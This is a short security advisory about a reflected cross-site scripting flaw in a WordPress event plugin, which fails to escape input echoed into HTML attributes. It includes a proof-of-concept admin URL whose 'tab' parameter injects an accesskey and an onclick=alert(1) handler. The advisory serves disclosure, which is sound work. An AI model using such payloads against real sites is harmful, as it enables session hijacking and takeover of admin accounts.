The plugin does not escape some user input before outputting it back in attributes, leading to Reflected Cross-SIte Scripting issues
And move the mouse over the ‘Untitled’ text (Firefox only): https://example.com/wp-admin/edit.php?post_type=ecwd_event&page;=ecwd_general_settings&tab;="+accesskey%3Dx+onclick%3Dalert(1)+p